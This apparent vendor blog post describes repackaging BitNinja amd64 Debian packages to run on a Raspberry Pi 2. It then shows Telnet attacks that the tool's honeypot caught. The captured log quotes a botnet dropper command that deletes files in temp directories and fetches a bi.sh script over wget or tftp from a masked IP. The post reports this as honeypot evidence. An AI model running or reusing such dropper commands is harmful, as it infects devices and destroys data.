Pi-Ninja-Security for RaspberryPi
Nikoletta Szabo

Pi-Ninja-Security for RaspberryPi

Nikoletta Szabo

The real geek escaped from one Ninjastic developer of ours lately, and in his freetime he decided to try to install BitNinja on his Raspberry Pi 2 model B. And guess what happened? He was successful! What is more, BitNinja also captured some attacks with its port honeypot module. Now, let me describe you the process of the installation and what he exactly found.

So the tool is Raspberry Pi 2 model B, and he uses Linux: Raspbian GNU/Linux 8 on it.

 

pininja_746_f8d6b70094412a1799772438df5434d5fe75a180

The process:

Bitninja is not available for arm architecture, so he was not able to install it from the Bitninja debian repository.  To by-pass this issue, he downloaded the packages from the repository:

wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja-dojo/bitninja-dojo_LATEST_VERSION_amd64.deb
wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja/bitninja_LATEST_VERSION_amd64.deb

„bitninja” is the client itself

„bitninja-dojo” is a standalone PHP executable

He started with the „bitninja” package, as the „bitninja-dojo”’s operation depends on the former one.

1, Create a directory for it

mkdir bitninja-dojo_armhf

2, Move the downloaded .deb file into the directory

mv bitninja-dojo_LATEST_VERSION_amd64.deb bitninja-dojo_armhf/bitninja-dojo_amd64.deb

3, Open the directory

cd bitninja-dojo_armhf

4, Unzip the .deb file with this command:

ar vx bitninja-dojo_amd64.deb

5, Delete it

rm bitninja-dojo_LATEST_VERSION_amd64.deb

After unzipping, we get 3 files

debian-binary
data.tar.gz –>contains all data in the package

control.tar.gz–>this zipped file contains the dependence of the package and the step by step instructions of the installation

6, Create a new directory

mkdir control

7, Move the control.tar.gz to the new directory and open it

mv control.tar.gz control/
cd control

8, Unzip it

tar -zxvf control.tar.gz

9, Delete the zipped file

rm control.tar.gz

10, After this, you need to create the following:

mcedit control

11, Find the following line and rename it
This:

Architecture: amd64

To this:

Architecture: armhf

12, Save it

13, Check the dependence of the package (in the control file):
Depends: libc6 (>= 2.11), zlib1g (>= 1:1.1.4)

So, it depends on two packages: libc6 és a zlib1g

As it is not defined, which architecture the package should originate from, so it should get them from one of the directories during the installation.
Just to make sure it works 100%, he installed them beforehand.a

pt-get update
apt-get install libc6 zlib1g

14,  Now, it is time to condense the conent of the control file

tar czf control.tar.gz *

15, Move it outward, and go one shell back:

mv control.tar.gz ../
cd ..

16, delete the control directory

rm -r control

17, it is time to repackage 3 source files into 1 .deb file

ar r bitninja-dojo_armhf.deb debian-binary control.tar.gz data.tar.gz

18, You can install it with this command:

dpkg -i bitninja-dojo_armhf.deb

As a matter of fact, we only had to modify the architecture, nothing else.

With the BitNinja package, you should follow the same steps as in the case of the BitNinja-dojo
19, Repeat the steps from 1 to 12 than check the dependence of the Bitninja file
Depends: bitninja-dojo (>= 1.6), ipset, daemon, iptables (>= 1.4.7), awk, net-tools, grep, gzip, sed, coreutils, lsb-release

As the BitNinja dojo is already installed, we only need to work with the other dependencies.

As he mentioned, the package should download the dependencies with itself. As he installed them for himself, he was not sure if it will work for the bitninja, as he had some issues with the awk package. :

Reading package lists... Done
Building dependency tree
Reading state information... Done
Package awk is a virtual package provided by:
original-awk 2012-12-20-2
mawk 1.3.3-17
gawk 1:4.1.1+dfsg-1
You should explicitly select one to install.

E: Package ‘awk’ has no installation candidate

Instead of this, he installed gawk

20, The whole command:

apt-get install ipset daemon iptables gawk net-tools grep gzip sed coreutils lsb-release

21, Follow the steps from 14 to 18
If you have done everything correctly, now the BitNinja is installed on your Raspberry, although, for now it will not start yet. The BitNinja client does not use php package, but it runs the php code with a standalone binary.  This is the bitninja-dojo. He though, it is probable that the binary is dependable on the architexture. (/opt/bitninja-dojo/run/bin/bitninja-dojo).
However, it is easily readable, as the php’s binary is similar and also available on the raspberry.
22, Install  the php5 with curl

apt-get install php5 php5-curl

23, change the bitninja-dojo with the php5 executable at the following places: 

/opt/bitninja/bitninja
/usr/sbin/bitninja-config
/usr/sbin/bitninjacli

this line:

#! /opt/bitninja-dojo/run/bin/bitninja-dojo -c=/opt/bitninja/etc

to this:

#!/usr/bin/php --php-ini=/opt/bitninja/etc

24, Set the license-keyt:

bitninja-config --set license_key=LICENSE_KEY

25, start the BitNinja:

/etc/init.d/bitninja start

For him, the BitNinja runs smoothly on his server.  The load is between 1,5 and 2,0.

If you would like to catch some bad guys with your Raspberry Pi , do the following settings:

Set your raspberry’s internal IP at the router’s DMZ (demilitarized zone) settings, and you can start the hunting. :) 

 

Our developer encountered with the following Telnet attacks:

“PORT HIT”: “xxx.xx.xxx.xx:46376->192.168.1.93:23″,
“MESSAGES”: “Array
(
=> sh || bash || shell

=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r bi2.sh -g xxx.xx.xxx.xxx || tftp -r bi2.sh -g xxx.xx.xxx.xxx || busybox tftp xxx.xx.xxx.xxx
=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r


Share your ideas with us about this article

Previous posts

BitNinja overcomes CVE-2016-5696 vulnerability
CVE-2016-5696 Linux Kernel vulnerability has been recognized two weeks ago by some watchful researchers , who immediately informed the world of the Internet about the potential dangers waiting for them. This vulnerability can be exploited by an attack called with the umbrella term: “man in the middle attack” and is mainly conducted by off-path hackers. RedHat and many other companies informed their clients about the new foundings and described the issue the following way: ” Researchers have discovered a flaw in the Linux kernel’s TCP/IP networking subsystem implementation of...
IPv6 – Plaything of the vicious
Did you know that using IPv6 on your server can completely bypass all your security? On Linux, there are separate kernel stacks, and separate mechanisms to filter traffic for the original IPv4 traffic and for IPv6. The kernel module responsible for this filtration is called ipfilter, and there is an other module called ipfilter6 for IPv6 traffic filtration.     The bad news is, you can have any rules for IPv4, it won’t help you against IPv6 traffic. Recently there was a case where BitNinja’s general port honeypot module started to catch malicious packets on an interface...